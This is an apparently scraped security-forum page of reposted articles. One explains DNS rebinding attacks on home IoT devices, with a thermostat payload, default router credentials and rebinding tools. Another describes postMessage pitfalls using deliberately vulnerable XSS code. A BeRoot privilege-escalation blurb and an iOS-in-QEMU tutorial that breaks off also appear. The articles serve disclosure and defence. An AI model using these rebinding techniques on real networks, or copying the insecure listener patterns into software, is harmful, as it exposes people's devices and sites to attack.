http://obtruse.syfrtext.com/2018/07/oracle-privilege-escalation-via.html
      • 1
      • Upvote
  4. Attacking Private Networks from the Internet with DNS Rebinding TL;DR Following the wrong link could allow remote attackers to control your WiFi router, Google Home, Roku, Sonos speakers, home thermostats and more. The home WiFi network is a sacred place; your own local neighborhood of cyberspace. There we connect our phones, laptops, and “smart” devices to each other and to the Internet and in turn we improve our lives, or so we are told. By the late twenty teens, our local networks have become populated by a growing number of devices. From smart TVs and media players to home assistants, security cameras, refrigerators, door locks and thermostats, our home networks are a haven for trusted personal and domestic devices. Many of these devices offer limited or non-existent authentication to access and control their services. They inherently trust other machines on the network in the same way that you would inherently trust someone you’ve allowed into your home. They use protocols like Universal Plug and Play (UPnP) and HTTP to communicate freely between one another but are inherently protected from inbound connections from the Internet by means of their router’s firewall. They operate in a sort of walled garden, safe from external threat. Or so their developers probably thought. A few months ago, I began to follow a winding path of research into a 10 year-old network attack called DNS rebinding. Put simply, DNS rebinding allows a remote attacker to bypass a victim’s network firewall and use their web browser as a proxy to communicate directly with devices on their private home network. By following the wrong link, or being served a malicious banner advertisement, you could inadvertently provide an attacker with access to the thermostat that controls the temperature in your home. NOTE: This research has been simultaneously released with a counterpart WIRED article on the subject by Lily Hay Newman. What is DNS Rebinding? To better understand how DNS rebinding works it’s helpful to first understand the security mechanism that it evades; the web browser’s same-origin policy. Many moons ago, browser vendors decided it probably wouldn’t be a good idea for web pages served from one domain to be able to make arbitrary requests to another domain without explicit permission from that second domain. If you follow a malicious link on the web, the web page you arrive at shouldn’t be able to make an HTTP request to your bank website and leverage your logged in-session there to empty your account. Browsers restrict this behavior by limiting HTTP requests originating from a domain to access only other resources that are also located on that domain (or another domain that explicitly enables cross-origin resource sharing). DNS can be abused to trick web browsers into communicating with servers they don’t intend to. The code at http://malicious.website can’t make a standard XMLHttpRequest to http://bank.com/transfer-fund because malicious.website and bank.com are different domains and therefor the browser treats them as separate origins. Browsers enforce this by requiring that the protocol, domain name, and port number of a URL being requested is identical to the URL of the page requesting it. Sounds good, right? Not so fast. Behind every domain name lies an IP address. malicious.website may reside at 34.192.228.43 and bank.com may call 171.159.228.150 home. The Domain Name System (DNS) provides a useful mechanism of translating easy-to-remember domain names into the IP addresses that our computer’s actually use to talk to each other. The catch is that modern browsers use URLs to evaluate same-origin policy restrictions, not IP addresses. What would happen if the IP address of malicious.website were to quickly changed from 34.192.228.43 to the IP address of 171.159.228.150? According to the browser, nothing would have changed. But now, instead of communicating with the server that originally hosted the website files at malicious.website, your browser would actually be talking to bank.com. See the problem? DNS can be abused to trick web browsers into communicating with servers they don’t intend to. DNS rebinding has received a few brief moments of attention over the past year when vulnerabilities were found in a few popular pieces of software. Most notably, Blizzard’s video games, the Transmission torrent client, and several Ethereum cryptocurrency wallets were vulnerable to DNS rebinding attacks until recently. In just the wrong circumstance, the Ethereum Geth vulnerability could have given a remote attacker full-control of the victim’s Ethereum account, and with it, all of their coin. DNS rebinding allows a remote attacker to bypass a victim’s network firewall and use their web browser as a proxy to communicate directly with devices on their private home network. How DNS Rebinding works An attacker controls a malicious DNS server that answers queries for a domain, say rebind.network. The attacker tricks a user into loading http://rebind.network in their browser. There are many ways they could do this, from phishing to persistent XSS or by buying an HTML banner ad. Once the victim follows the link, their web browser makes a DNS request looking for the IP address of rebind.network. When it receives the victim’s DNS request, the attacker controlled DNS server responds with rebind.network’s real IP address, 34.192.228.43. It also sets the TTL value on the response the be 1 second so that the victim’s machine won’t cache it for long. The victim loads the web page from http://rebind.network which contains malicious JavaScript code that begins executing on the victim’s web browser. The page begins repeatedly making some strange looking POST requests to http://rebind.network/thermostatwith a JSON payload like {“tmode”: 1, “a_heat”: 95}. At first, these requests are sent to the attacker’s web server running on 34.192.228.43, but after a while (browser DNS caching is weird) the browser’s resolver observes that the DNS entry for rebind.network is stale and so it makes another DNS lookup. The attacker’s malicious DNS server receives the victim’s second DNS request, but this time it responds with the IP address 192.168.1.77, which happens to be an IP address of a smart thermostat on the victim’s local network. The victim’s machine receives this malicious DNS response and begins to point to HTTP requests intended for http://rebind.network to 192.168.1.77. As far as the browser is concerned nothing has changed and so it sends another POST to http://rebind.network/thermostat. This time, that POST request gets sent to the small unprotected web server running on the victim’s WiFi-connected thermostat. The thermostat processes the request and the temperature in the victim’s home is set to 95 degrees ?. This scenario is an actual exploit (CVE-2018–11315) that I’ve found and used against my Radio Thermostat CT50 “smart” thermostat. The implications and impact of an attack like this can have far reaching and devastating effects on devices or services running on a private network. By using a victim’s web browser as a sort of HTTP proxy, DNS rebinding attacks can bypass network firewalls and make every device on your protected intranet available to a remote attacker on the Internet. What’s Vulnerable? After finding and exploiting this vulnerability in the very first device that I poked around with, I feared that there were likely many other IoT devices that could also be targeted. I began to collect and borrow some of the more popular smart home devices on the market today. Over the next few weeks every device that I got my hands on fell victim to DNS rebinding in one way or another, leading to information being leaked, or in some cases, full device control. Google Home, Chromecast, Roku, Sonos WiFi speakers, and certain smart thermostats could all be interfaced with in some way by an unauthorized remote attacker. Seems like a big problem huh? The idea that the local network is a safe haven is a fallacy. If we continue to believe it people are going to get hurt. I’ve been in contact with the vendors of these products and all of them are working on or have already released security patches (more on that disclosure in this essay). Those are just the companies whose devices I’ve personally tested in my spare time. If companies with such high profiles are failing to prevent against DNS rebinding attacks there must be countless other vendors that are as well. Proof of concept DNS rebinding attack @ http://rebind.network I’ve authored a proof-of-concept exploit that you can use to target these devices on your home network today. That demo is live at http://rebind.network. Google Home Google Home Mini The apps used to control Google Home products make use of an undocumented REST API running on port 8008 of these devices (e.g. http://192.168.1.208:8008). The first mention of this service that I’ve been able to find surfaced back in 2013 when Brandon Fiquett wrote about a Local API he found while sniffing the WiFi traffic to his Chromecast. Fast forward five years and it seems that Google has integrated that same mysterious API into all of its Google Home products, and as you can imagine, that undocumented API is fairly well documented by amateurs and hobbyists at this point. In fact, earlier this year Rithvik Vibhu published detailed API docs to the public. This API provides extensive device control without any form of authentication. Some of the most interesting features include the ability to launch entertainment apps and play content, scan and join nearby WiFi networks, reboot, and even factory reset the device. Imagine a scenario where you’re browsing the web and all of a sudden your Google Home factory resets. What if your roommate left their web browser open on their laptop and an HTML advertisement sends your Chromecast into reboot loops while you are trying to watch a movie? One of my favorite attack scenarios targeting this API is an abuse of the WiFi scanning capability. Attackers could pair this information with publicly accessible wardriving data and get accurate geolocation using only your list of nearby WiFi networks. This attack would be successful even if you’ve disabled your web browser’s geolocation API and are using a VPN to tunnel your traffic through another country. Here is an example of some of the data that I’ve exfiltrated from my own Chromecast. Can you figure out where I might be writing this post from? UPDATE (06/19/2018): Craig Young's simultaneous and independent research on this vulnerability was disclosed yesterday, just ahead of this post. He actually created a PoC for the geolocation attack scenario that I described above, but never implemented! His work, and Brian Kreb's commentary on it are both excellent ???. I notified Google about this vulnerability when I discovered it in March and again in April after receiving no response. According to Kreb's post, Young reported the bug to Google in May and his ticket was closed with "Status: Won’t Fix (Intended Behavior)." It wasn't until Krebs himself contacted Google that they agreed to patch the vulnerability. Google is expected to release a patch in mid-July 2018. Sonos WiFi Speakers Sonos Play:1 Like Google Home, Sonos WiFi speakers can also be controlled by a remote attacker (CVE-2018–11316). By following the wrong link you could find your pleasant evening jazz play list interrupted by content of a very different sort. That’s fun for simple pranks, but ultimately pretty harmless, right? After a bit of digging I found a few other interesting links to be followed on the Sonos UPnP web server that might not be so innocent. It appears that several hidden web pages are accessible on the device for debugging purposes. http://192.168.1.76:1400/support/review serves an XML file that appears to contain the output of several Unix commands run on the Sonos device (which itself seems to run a distribution of Linux). http://192.168.1.76:1400/tools provides a bare bones HTML form that lets you run a few of these Unix commands on the Sonos device yourself! The Sonos HTTP API allows a remote attacker to map internal and external networks using the traceroute command and probe hosts with ICMP requests with ping using simple POST requests. An attacker could use a Sonos device as a pivot point to gather useful network topology and connectivity information to be used in a follow up attack. UPDATE (06/19/2018): Sonos has published a statement along with this public release; "Upon learning about the DNS Rebinding Attack, we immediately began work on a fix that will roll out in a July software update." Roku RokuTV While exploring the network in the lounge at my work building, I found an HTTP server running on port 8060 of a RokuTV. I soon found that Roku’s External Control API provides control over basic functionality of the device, like launching apps, searching, and playing content. Interestingly, it also allows direct control over button and key presses like a virtual remote, as well as input for several sensors including an accelerometer, orientation sensor, gyroscope and even a magnetometer (why?) As you’ve probably guessed, this local API requires no authentication and can be exploited via DNS rebinding (CVE-2018–11314). I reported these findings to the Roku security team, who initially responded saying: There is no security risk to our customers’ accounts or the Roku platform with the use of this API… We are aware of web apps like http://remoku.tv that can be loaded into a browser and used to interact with the Roku on the same local network. After describing a detailed attack scenario, a security VP at the company clarified that their team does “consider this a valid threat and it is not mundane in the least.” To the team’s credit, they immediately halted the release roll out of Roku OS 8.1 and began to develop a patch, which they expected could take as long as 3–4 months if they couldn’t find a solution that worked in time for their upcoming release. After some consideration, I informed the team that I was working with a reporter at WIRED and that we were likely going to publish the research quickly. The next morning I received an email from the team that a patch had been developed and was already in the process of being pushed to over 20 million devices through a firmware update! UPDATE (06/19/2018): Roku has released a statement along with this public release; “After recently becoming aware of the DNS Rebinding issue, we created a software patch which is now rolling out to customers. Note that any potential exploitation of this vulnerability poses no security risk to our customers’ accounts, our channel partners’ content security or the Roku platform.” Radio Thermostat Radio Thermostat CT50 The Radio Thermostat CT50 & CT80 devices have by far the most consequential IoT device vulnerabilities I’ve found so far. These devices are some of the cheapest “smart” thermostats available on the market today. I purchased one to play with after being tipped off to their lack of security by CVE-2013–4860, which reported that the device had no form of authentication and could be controlled by anyone on the network. Daniel Crowley of Trustwave SpiderLabs had attempted to contact the vendor several times before ultimately publishing the vulnerability after hearing no response from the company. Unfortunately, this lack of response is a recurring theme of vulnerability disclosure over the years, especially with smaller manufacturers. I expected that the chances that the vulnerability had gone unpatched for five years was actually high, so I purchased a brand new CT50. That assumption turned out to be correct and the thermostat’s control API left the door wide open for DNS rebinding shenanigans. It’s probably pretty obvious the kind of damage that can be done if your building’s thermostat can be controlled by remote attackers. The PoC at http://rebind.network exfiltrates some basic information from the thermostat before setting the target temperature to 95° F. That temperature can be dangerous, or even deadly in the summer months to an elderly or disabled occupant. Not to mention that if your device is targeted while you’re on vacation you could return home to a whopper of a utility bill. The severity of this vulnerability, and the continued negligence by the Radio Thermostat Company of America who’ve had years to fix it, are perfect examples of why we need security regulation for IoT devices. WiFi Routers If you’ve been following all of this so far you may have already started to think of other devices on home networks that could be targeted. Would it surprise you to learn that, historically, network routers themselves are some of the most common targets to DNS rebinding attacks? Probably not. That’s because network routers hold the keys to the kingdom. Own the router and you own the network. There are two common attack vectors that I’ve seen with DNS rebinding: POSTing default credentials to a login page like http://192.168.1.1/loginto own router admin. Once the attacker has authenticated they have full device control and can configure the network as they please. Using a router’s Internet Gateway Device (IGD) interface through UPnP to configure permanent port forwarding connections and expose arbitrary UDP & TCP ports on the network to the public Internet. The first is pretty basic. Many routers ship with default login credentials and consumers never change them. Sure, maybe they will enable WPA2 and set a WiFi password, but I bet many of them don’t realize their router’s configuration panel is still accessible to anyone on the network using “admin:admin”. The second attack is even worse, a downright travesty. Somehow, in this day and age, most brand-spanking-new home routers still ship with UPnP servers enabled by default. These UPnP servers provide admin-like control over router configuration to any unauthenticated machine on the network over HTTP. Any machine on the network, or the public Internet through DNS rebinding, can use IGD/UPnP to configure a router’s DNS server, add & remove NAT and WAN port mappings, view the # of bytes sent/received on the network, and access the router’s public IP address (check out upnp-hacks.org for more info). A DNS rebinding attack that targets a router’s UPnP server can punch a hole in the victim’s firewall, leaving a permanent entry point to execute raw TCP & UDP attacks against devices on the network without being bound to the normal HTTP-only limitations of DNS rebinding attacks. They can even configure port forwarding rules that forward traffic to external IP addresses on the Internet, allowing an attacker to add a victim’s router as a node in a large network of infected routers that can be used to mask their traffic from authorities (see Akamai’s recent UPnProxy research). IGD also provides an interface to discover a router’s public IP address through a simple unauthenticated HTTP request. This functionality, combined with DNS rebinding, can be used to de-anonymize users who are otherwise attempting to mask their public IP address through a VPN or by using TOR. In my experience router vulnerability to DNS rebinding is a mixed bag. I’ve seen routers that completely block DNS rebinding attacks, routers that randomize their UPnP server port to make discovery and attack more difficult, and I’ve seen routers that are completely wide-open to the attack. I should mention though that I’ve largely stayed away from applying my DNS rebinding research to routers so far... Mostly because I’m almost too afraid to look ?. The Walled Garden Is a Lie How is it that so many devices today could be vulnerable to an attack that was introduced over ten years ago? There are likely more reasons for this than I can explain, but I’m willing to bet money on two of them. The first is awareness. Best I can tell, DNS rebinding isn’t as popular of an attack as it should be. Sure, security nerds may have heard of it but I’d wager that very few of them have actually ever tried it. It’s historically been a sort of cumbersome and difficult to pull off attack in practice. You have to spin up a malicious DNS server in the cloud, write some custom JavaScript payload targeting a specific service, serve that to a victim on a target network, and then figure out how to use their web browser to pivot to a target machine running that service, which you probably don’t know the IP address of. There’s overhead and it’s error prone. (I’ve written some tooling to ease some of that pain. More below…) We need developers to write software that treats local private networks as if they were hostile public networks. Even if DNS rebinding becomes more popular in cybersecurity communities, that isn’t a guarantee that we’ll see a large drop in the number of vulnerable devices. That’s because security nerds aren’t the ones implementing these APIs, web developers are. Sure web developers should know that externally facing API endpoints need authorization of some kind, but there is a recurring general consensus that private networks themselves can be used to secure intranet facing APIs. Local APIs consistently offload trust and security to the private network itself. Why would your local REST API need authorization if your router has it? Entire protocols like UPnP are built around the idea that devices on the same network can trust each other. This is the root of the problem. We need developers to write software that treats local private networks as if they were hostile public networks. The idea that the local network is a safe haven is a fallacy. If we continue to believe it people are going to get hurt. Protecting against DNS Rebinding Consumers As the user of a product or service you are often at the mercy of the the people who built it. Fortunately, in the case of DNS rebinding, you have some control over protecting your network so long as you can make changes to your router’s configuration. OpenDNS Home is a free DNS service that can be configured to filter suspicious IP addresses like private IP ranges out of DNS responses. You should be able to change the DNS server your router uses from the default ISP’s DNS server to one of OpenDNS Home’s DNS servers in your router settings. If you’d prefer to control this filtering on your router itself instead of trusting a public DNS server like OpenDNS to do it, you can use Dnsmasq or opt to install libre router firmware like DD-RT on the router itself. Either of these solutions are adequate if you have control over your router, but watch out, because you may still be a target of DNS rebinding attacks whenever you are on a network that hasn’t been explicitly configured to protect against them. Developers If you’re a developer, or are involved in creating a product that has an HTTP API, there are several things you can do to protect it from DNS rebinding attacks. There are three simple solutions to choose from. The first, and simplest to implement without side-effects to your existing system, is to add “Host” header validation to your HTTP server. This header is included in all HTTP requests sent from a modern browser and it contains the host (hostname:port) of the server it is expecting to communicate with. This value can be a domain name or an IP address, but either way, the server that receives the request should validate that it’s own host matches the host being requested. Because DNS rebinding relies on the change of an underlying IP address associated with a domain name, the Host header included in a malicious HTTP request that’s been rebound to a target service will maintain the original domain name as its Host header value. A malicious POST request to your router’s login page will have a Host header value that doesn’t match your router’s hostname or IP address on the network. It would instead look like Host: malicious.website. Web servers should validate that the requested Host header matches it’s expected value exactly and respond with a 403 Forbidden HTTP status code if it doesn’t. I’ve written an NPM module that does this for Express.js web servers, but it should be pretty easy to implement in any web server or language. Another effective method of spoiling DNS rebinding attacks is to use HTTPS instead of HTTP, even for local network connections. When rebinding occurs, the service being targeted will have an SSL certificate that isn’t valid for malicious.website and so a security warning will block the request from reaching your API endpoint. This solution has the added bonus of providing extra privacy and security for your users in general with the usual benefits that come with TLS/SSL. Vendors have historically shied away from shipping IoT devices with their own TLS/SSL certificates, but the Plex media server software has tackled this problem in an interesting way by actually using DNS rebinding to issue certificates and protect their customers! Probably the best solution, albeit the one that involves the most potential disruption to your existing service, is to add some form of user authentication to your API. If your API controls real world functionality or provides access to sensitive information it should be accessible to select parties only. Period. It should not be accessible to the entire private network and therefore the public Internet as well through DNS rebinding. There is absolutely no reason that any device on the WiFi network should be able to arbitrarily control the heat in a building. People forget how easy it is to crack WPA2 WiFi. Tooling & Details To help spread awareness of DNS rebinding attacks I’ve built tooling and libraries that others can use to author their own DNS rebinding attacks. Aside from the JavaScript payload written to target a specific device or service, the process of delivering that payload, interacting with the malicious DNS server, and enumerating hosts on the victim’s private network is pretty much the same between different attack targets. To lower the barrier to entry to learn about and perform DNS rebinding attacks, I’ve open sourced: A “malicious” DNS server called whonow A front-end JavaScript library called DNS rebind toolkit Whonow DNS Server Whonow is a custom DNS server that lets you specify DNS responses and rebind rules dynamically using domain requests themselves. Here’s an example of how it works: # respond to DNS queries for this domain with 34.192.228.43 the first # time it is requested and then 192.168.1.1 every time after that. A.34.192.228.43.1time.192.168.1.1.forever.rebind.network # respond first with 34.192.228.43, then 192.168.1.1 the next five # times, and then start all over again (1, then 5, forever…) A.34.192.228.43.1time.192.168.1.1.5times.repeat.rebind.network What’s great about dynamic DNS Rebinding rules is that you don’t have to spin up your own malicious DNS server to start exploiting the browser’s same-origin policy. Instead, everyone can share the same public whonow server running on port 53 of rebind.network. You can try it now if you’d like, just use dig to query the public whonow instance. It responds to requests for *rebind.network domain names. # dig is a unix command for making DNS requests dig A.10.10.10.50.forever.rebind.network ;; QUESTION SECTION: ;10.10.10.50.forever.rebind.network. IN A ;; ANSWER SECTION: 10.10.10.50.forever.rebind.network. 1 IN A 10.10.10.50 Whonow always sets TTL values to one second so you can expect that it’s responses won’t stay in a DNS resolver’s cache for long. Whonow public server output DNS Rebind Toolkit DNS Rebind Toolkit is a utility library that automates the process of executing DNS rebinding attacks. Once you’ve written a JavaScript payload to target a specific service, DNS Rebind Toolkit can help you deploy that attack on a victim’s network. It uses a WebRTC IP address leak to discover the victim’s local IP address. It automates network subnet enumeration so that you can target devices even if you don’t know their IP addresses on the private network. It automates the DNS rebinding portion of the attack. You get a Promise that resolves once the rebind has finished. It uses whonow behind the scenes so that you don’t have to worry about the DNS server component of a DNS rebinding attack. It comes with several payloads for attacking common IoT devices and well-documented examples so that you learn to write your own exploits. Launching an attack against a Google Home device on a 192.168.1.1/24 subnet is as easy as embedding a code snippet in and index.html page. That index.html file will launch the attack, spawning one iframe for each IP address in the array passed to rebind.attack(…). Each iframe embeds payloads/google-home.html with the following JavaScript snippet: ?? Links & Thanks ? Thanks to Lily Hay Newman for three months of helpful conversations leading towards her coverage of this research in WIRED. Mega-thanks to William Robertson for his help with this work, especially for letting me pwn his home network + Sonos device ?. I’d also like to thank the security teams at both Roku and Sonos for their swift response in developing and deploying firmware updates to protect their users against DNS rebinding attacks. Below are a collection of DNS rebinding resources I’ve found useful in my research. You might too! Stanford’s Original DNS Rebinding Research (2007) DNS Rebinding with Robert RSnake Hansen (great video) CORS, the Frontendian Luke Young’s DEFCON 25 “Achieving Reliable DNS Rebinding” Ricky Lawshae’s DEFCON 19 SOAP & UPnP Talk UPnP Hacks website Dear developers, beware of DNS Rebinding Practical Attacks with DNS Rebinding Original Blizzard Game’s DNS rebinding bug report by Tavis Ormandy DNS Security Cybersecurity Hacking Vulnerability Like what you read? Give Brannon Dorsey a round of applause. From a quick cheer to a standing ovation, clap to show how much you enjoyed this story. Brannon Dorsey Artist | Programmer | Researcher Sursa: https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325
  5. The pitfalls of postMessage December 8, 2016 The postMessage API is an alternative to JSONP, XHR with CORS headers and other methods enabling sending data between origins. It was introduced with HTML5 and like many other cross-document features it can be a source of client-side vulnerabilities. How it works To send a message, an application simply calls the "postMessage" function on the target window it would like to send the message to: targetWindow.postMessage("hello other document!", "*"); And to receive a message, a “message” event handler can be registered on the receiving end: window.addEventListener("message", function(message){console.log(message.data)}); Pitfall 1 The first pitfall lies in the second argument of the “postMessage” function. This argument specifies which origin is allowed to receive the message. Using the wildcard “*” means that any origin is allowed to receive the message. Since the target window is located at a different origin, there is no way for the sender window to know if the target window is at the target origin when sending the message. If the target window has been navigated to another origin, the other origin would receive the data. Pitfall 2 The second pitfall lies on the receiving end. Since the listener listens for any message, an attacker could trick the application by sending a message from the attacker’s origin, which would make the receiver think it received the message from the sender’s window. To avoid this, the receiver must validate the origin of the message with the “message.origin” attribute. If regex is used to validate the origin, it’s important to escape the “.” character, since this code: //Listener on http://www.examplereceiver.com/ window.addEventListener("message", function(message){ if(/^http://www.examplesender.com$/.test(message.origin)){ console.log(message.data); } }); Would not only allow messages from “www.examplesender.com“, but also “wwwaexamplesender.com“, “wwwbexamplesender.com” etc. Pitfall 3 The third pitfall is DOM XSS by using the message in a way that the application treats it as HTML/script, for example: //Listener on http://www.examplereceiver.com/ window.addEventListener("message", function(message){ if(/^http://www\.examplesender\.com$/.test(message.origin)){ document.getElementById("message").innerHTML = message.data; } }); DOM XSS isn’t postMessage specific, but it’s something that’s present in many postMessage implementations. One reason for this could be that the receiving application expects the data to be formatted correctly, since it’s only listening for messages from http://www.examplesender.com/. But what if an attacker finds an XSS bug on http://www.examplesender.com/? That would mean that they could XSS http://www.examplereceiver.com/ as well. Not using postMessage? You might be thinking “our application doesn’t use postMessage so these issues doesn’t apply to us”. Well, a lot of third party scripts use postMessage to communicate with the third party service, so your application might be using postMessage without your knowledge. You can check if a page has a registered message listener (and which script registered it) by using Chrome Devtools, under Sources -> Global Listeners: Some third party scripts fall into these pitfalls. In the next post I will describe a postMessage vulnerability that caused XSS on over a million websites, and the technique I used to find it. References https://seclab.stanford.edu/websec/frames/post-message.pdf https://www.w3.org/TR/webmessaging/ http://caniuse.com/#feat=x-doc-messaging Author: Mathias Karlsson Security Researcher @avlidienbrunn Sursa: https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/
      • 1
      • Upvote
  6. Nytro

    test

  7. Nytro

    test

    Am vorbit cu cel care a facut plugin-ul, i-a facut update si l-am activat. Se mai poate reproduce?
  8. Nytro

    test

  9. BeRoot Project BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the pupy project as a post exploitation module (so it will be executed in memory without touching the disk). This tool does not realize any exploitation. It mains goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connection, etc.) but to print only information that have been found as potential way to escalate our privilege. This project works on Windows, Linux and Mac OS. You could find the Windows version here and the Linux and Mac OS here I recommend reading the README depending on the targeted OS, to better understand what's happening. I tried to implement most technics described in this picture: Enjoy Interesting projects Windows / Linux Local Privilege Escalation Workshop Linux tools Windows tools Sursa: https://github.com/AlessandroZ/BeRoot
  10. awesome-windows-kernel-security-development ❤️ windows kernel driver with c++ runtime https://github.com/wjcsharp/Common https://github.com/ExpLife/DriverSTL https://github.com/sysprogs/BazisLib https://github.com/AmrThabet/winSRDF https://github.com/sidyhe/dxx https://github.com/zer0mem/libc https://github.com/eladraz/XDK https://github.com/vic4key/Cat-Driver https://github.com/AndrewGaspar/km-stl https://github.com/zer0mem/KernelProject https://github.com/zer0mem/miniCommon https://github.com/jackqk/mystudy https://github.com/yogendersolanki91/Kernel-Driver-Example Full list: https://github.com/ExpLife0011/awesome-windows-kernel-security-development
  11. Tutorial - emulate an iOS kernel in QEMU up to launchd and userspace Jul 21, 2018 I got launchd and recoveryd to start on an emulated iPhone running iOS 12 beta 4’s kernel using a modified QEMU. Here’s what I learned, and how you can try this yourself. Introduction This is Part 2 of a series on the iOS boot process. Part 1 is here. Sign up with your email to be the first to read new posts. skip to: tutorial, writeup First, let me repeat: this is completely useless unless you’re really interested in iOS internals. If you want to run iOS, you should ask @CorelliumHQ instead, or just buy an iPhone. I’ve been interested in how iOS starts, so I’ve been trying to boot the iOS kernel in QEMU. I was inspired by @cmwdotme’s Corellium, a service which can boot any iOS in a virtual machine. Since I don’t have 9 years to build a perfect simulation of an iPhone, I decided to go for a less lofty goal: getting enough of iOS emulated until launchd, the first program to run when iOS boots, is able to start. Since last week’s post, I got the iOS 12 beta 4 kernel to fully boot in QEMU, and even got it to run launchd and start recoveryd from the restore ramdisk. Here’s the output from the virtual serial port: iBoot version: corecrypto_kext_start called FIPSPOST_KEXT [64144875] fipspost_post:156: PASSED: (4 ms) - fipspost_post_integrity FIPSPOST_KEXT [64366750] fipspost_post:162: PASSED: (1 ms) - fipspost_post_hmac FIPSPOST_KEXT [64504187] fipspost_post:163: PASSED: (0 ms) - fipspost_post_aes_ecb FIPSPOST_KEXT [64659750] fipspost_post:164: PASSED: (0 ms) - fipspost_post_aes_cbc FIPSPOST_KEXT [72129500] fipspost_post:165: PASSED: (117 ms) - fipspost_post_rsa_sig FIPSPOST_KEXT [76481625] fipspost_post:166: PASSED: (67 ms) - fipspost_post_ecdsa FIPSPOST_KEXT [77264187] fipspost_post:167: PASSED: (11 ms) - fipspost_post_ecdh FIPSPOST_KEXT [77397875] fipspost_post:168: PASSED: (0 ms) - fipspost_post_drbg_ctr FIPSPOST_KEXT [77595812] fipspost_post:169: PASSED: (1 ms) - fipspost_post_aes_ccm FIPSPOST_KEXT [77765500] fipspost_post:171: PASSED: (1 ms) - fipspost_post_aes_gcm FIPSPOST_KEXT [77941875] fipspost_post:172: PASSED: (1 ms) - fipspost_post_aes_xts FIPSPOST_KEXT [78176875] fipspost_post:173: PASSED: (1 ms) - fipspost_post_tdes_cbc FIPSPOST_KEXT [78338625] fipspost_post:174: PASSED: (1 ms) - fipspost_post_drbg_hmac FIPSPOST_KEXT [78460125] fipspost_post:197: all tests PASSED (233 ms) AUC[<ptr>]::init(<ptr>) AUC[<ptr>]::probe(<ptr>, <ptr>) Darwin Image4 Validation Extension Version 1.0.0: Mon Jul 9 21:36:59 PDT 2018; root:AppleImage4-1.200.16~357/AppleImage4/RELEASE_ARM64 AppleCredentialManager: init: called, instance = <ptr>. ACMRM: init: called, ACMDRM_ENABLED=YES, ACMDRM_STATE_PUBLISHING_ENABLED=YES, ACMDRM_KEYBAG_OBSERVING_ENABLED=YES. ACMRM: _loadRestrictedModeForceEnable: restricted mode force-enabled = 0 . ACMRM-A: init: called, . ACMRM-A: _loadAnalyticsCollectionPeriod: analytics collection period = 86400 . ACMRM: _getDefaultStandardModeTimeout: default standard mode timeout = 604800 . ACMRM: _loadStandardModeTimeout: standard mode timeout = 604800 . ACMRM-A: notifyStandardModeTimeoutChanged: called, value = 604800 (modified = YES). ACMRM: _loadGracePeriodTimeout: device lock timeout = 3600 . ACMRM-A: notifyGracePeriodTimeoutChanged: called, value = 3600 (modified = YES). AppleCredentialManager: init: returning, result = true, instance = <ptr>. AUC[<ptr>]::start(<ptr>) AppleKeyStore starting (BUILT: Jul 9 2018 21:51:06) AppleSEPKeyStore::start: _sep_enabled = 1 AppleCredentialManager: start: called, instance = <ptr>. AppleCredentialManager: start: initializing power management, instance = <ptr>. AppleCredentialManager: start: started, instance = <ptr>. AppleCredentialManager: start: returning, result = true, instance = <ptr>. AppleARMPE::getGMTTimeOfDay can not provide time of day: RTC did not show up : apfs_module_start:1277: load: com.apple.filesystems.apfs, v748.200.53, 748.200.53.0.1, 2018/07/09 com.apple.AppleFSCompressionTypeZlib kmod start IOSurfaceRoot::installMemoryRegions() IOSurface disallowing global lookups apfs_sysctl_register:818: done registering sysctls. com.apple.AppleFSCompressionTypeZlib load succeeded L2TP domain init L2TP domain init complete PPTP domain init BSD root: md0, major 2, minor 0 apfs_vfsop_mountroot:1468: apfs: mountroot called! apfs_vfsop_mount:1231: unable to root from devvp <ptr> (root_device): 2 apfs_vfsop_mountroot:1472: apfs: mountroot failed, error: 2 hfs: mounted PeaceSeed16A5327f.arm64UpdateRamDisk on device b(2, 0) : : Darwin Bootstrapper Version 6.0.0: Mon Jul 9 00:39:56 PDT 2018; root:libxpc_executables-1336.200.86~25/launchd/RELEASE_ARM64 boot-args = debug=0x8 kextlog=0xfff cpus=1 rd=md0 Thu Jan 1 00:00:05 1970 localhost com.apple.xpc.launchd[1] <Notice>: Restore environment starting. If you would like to examine iOS’s boot process yourself, here’s how you can try it out. Building QEMU The emulation uses a patched copy of QEMU, which must be compiled from source. Install dependencies To compile QEMU, you first need to install some libraries. macOS: According to the QEMU wiki and the Homebrew recipe, you need to install Xcode and Homebrew, then run brew install pkg-config libtool jpeg glib pixman to install the required libraries to compile QEMU. Ubuntu 18.04: According to the QEMU wiki, run sudo apt install libglib2.0-dev libfdt-dev libpixman-1-dev zlib1g-dev libsdl1.2-dev to install the required libraries to compile QEMU. Windows: QEMU can be built on Windows, but their instructions doesn’t seem to work for this modified QEMU. Please build on macOS or Linux instead. You can set up a virtual machine running Ubuntu 18.04 with Virtualbox or VMWare Player. Download and build source Open a terminal, and run git clone https://github.com/zhuowei/qemu.git cd qemu git submodule init git submodule update mkdir build-aarch64 cd build-aarch64 ../configure --target-list=aarch64-softmmu make -j4 Preparing iOS files for QEMU Once QEMU is compiled, you need to obtain the required iOS kernelcache, device tree, and ramdisk. If you don’t want to extract these files yourself, I packaged all the files you need from iOS 12 beta 4. You can download this archive if you sign up for my mailing list. If you want to extract your own files directly from an iOS update, here’s how: 1. Download the required files: Download my XNUQEMUScripts repository: git clone https://github.com/zhuowei/XNUQEMUScripts.git cd XNUQEMUScripts Download the iOS 12 beta 4 for iPhone X. To decompress the kernel, download newosxbook’s Joker tool. 2. Extract the kernel using Joker: ./joker.universal -dec ~/path/to/iphonex12b4/kernelcache.release.iphone10b mv /tmp/kernel kcache_out.bin replace joker.universal with joker.ELF64 if you are using Linux. 3. extract the ramdisk: dd if=~/path/to/iphonex12b4/048-22007-059.dmg bs=27 skip=1 of=ramdisk.dmg 4. Modify the devicetree.dtb file: python3 modifydevicetree.py ~/Path/To/iphonex12b4/Firmware/all_flash/DeviceTree.d22ap.im4p devicetree.dtb Installing a debugger You will also need lldb or gdb for arm64 installed. macOS The version of lldb included in Xcode 9.3 should work. (Later versions should also work.) You don’t need to install anything in this step. Ubuntu 18.04 I can’t find an LLDB compatible with ARM64: neither the LLDB from the Ubuntu repository nor the version from LLVM’s own repos support ARM64. (Someone please build one!) Instead, you can use GDB on Linux. Two versions of GDB can be used: the version from devkitA64, or the Linaro GDB (recommended). Enter your xnuqemu directory (from the downloaded package or from the clone of 